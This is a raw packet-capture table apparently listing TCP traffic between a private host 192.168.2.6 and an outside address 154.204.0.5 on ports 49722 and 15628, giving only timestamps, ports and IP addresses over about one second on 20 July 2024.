Jul 20, 2024 16:31:17.606761932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.611707926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.611769915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.616872072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.616925955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.622014046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.622067928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.626991034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.627053022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.667517900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.667661905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.673340082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.673422098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.673851967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.673911095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.678958893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.679018021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.679582119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.679689884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.684009075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.684061050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.684787035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.684839010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.689141989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.689191103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.689877033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.689925909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.694277048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.694328070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.694777966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.694820881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.699244976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.699295044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.699615955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.699670076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.704304934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.704364061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.704660892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.704714060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.709733009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.709795952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.714647055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.714704037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.743395090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.752367020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.752429962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.752562046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.752655983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.752712011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.757433891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.757493019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.757652998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.757704973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.762911081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.762969971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.767807007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.767874002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.773140907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.773194075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.778182983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.778234959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.783134937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.783189058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.788049936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.793463945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.798290968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.798341036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.803147078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.803199053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.809171915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.809243917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.814146042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.814199924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.819247007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.819300890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.824162960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.824210882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.829760075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.829818010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.835846901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.835900068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.852622986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.852689981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.857593060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.857651949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.868916035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.868978024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.875974894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.876027107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.881057024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.881112099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.886414051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.886470079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.891817093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.891874075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.897635937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.897695065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.902735949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.902802944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.909894943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.909955978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.916085005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.916136026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.921181917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.921243906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.926675081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.926733971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.932934999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.932993889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.940865993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.940917015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.945888042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.945943117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.951318979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.951668978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.957705975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.957763910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.963268042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.963326931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.968882084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.968945980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.974061966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.974140882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.981308937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.981384993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.986442089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.986512899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.991976023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.992032051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.997391939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.997467995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.033000946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.033073902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.038445950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.038517952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.049943924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.050004959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.055619955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.055679083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.062279940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.062338114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.067367077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.067425013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.076270103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.076322079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.081978083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.082037926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.087613106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.087662935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.093358994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.093415976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.099138975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.099189997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.104141951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.104197025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.124880075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.124943972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.130445957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.130510092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.137057066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.137118101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.143296003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.143358946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.150819063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.160588980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.166487932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.166558027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.171569109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.171619892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.177083969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.177139044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.182054043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.182112932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.187591076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.187647104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.194891930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.194961071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.200186014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.200248957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.206662893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.206718922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.211965084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.212013960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.221014977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.221081018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.228025913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.228079081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.234997034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.235064983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.240866899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.240926981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.246579885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.246632099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.252473116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.252525091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.257431030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.257486105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.262339115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.262387991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.267302036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.267353058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.274348974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.274404049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.281330109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.281443119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.287431955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.287484884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.292684078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.292733908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.297667980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.297727108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.302684069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.302732944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.307780981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.307853937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.312926054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.312982082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.317847013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.317900896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.324353933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.324510098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.332241058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.332303047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.337778091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.337860107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.343943119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.344060898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.349481106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.349610090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.354953051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.355015993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.361000061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.361056089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.366055012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.366903067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.372586012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.372863054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.378820896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.378894091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.383743048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.384257078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.389813900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.390710115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.395514011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.395629883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.400749922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.400960922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.405781984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.405920029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.426037073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.429724932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.429840088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.431463957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.431798935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.432281017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.432423115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.436166048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.436304092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.445847034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.449774027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.454792976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.459496975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.464448929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.472115040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.485249996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.491966963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.496893883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.503726959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.508877039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.513957977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.519320965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.519785881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.524795055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.528202057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.533293009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.540067911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.545191050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.551700115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.556632042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.563889980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.568844080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.575757980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.581260920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.581948996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.587107897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.588171005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.593174934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.595768929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.600810051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.603975058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.608856916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.612050056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.617533922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.620513916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.625825882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.628977060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.633843899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.633945942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.639022112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.639230967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.644057035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.648005962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.652951002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.653079987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.661459923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.661684036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.666502953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.666672945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.672565937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.673003912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.677932024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.678603888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.683965921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.684470892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.689343929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.689429045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.694627047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.694844007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.699666023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.699904919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.705625057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.707638025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.719106913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.719218016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:18.724205971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:18.724370003 CEST	49722	15628	192.168.2.6	154.204.0.5
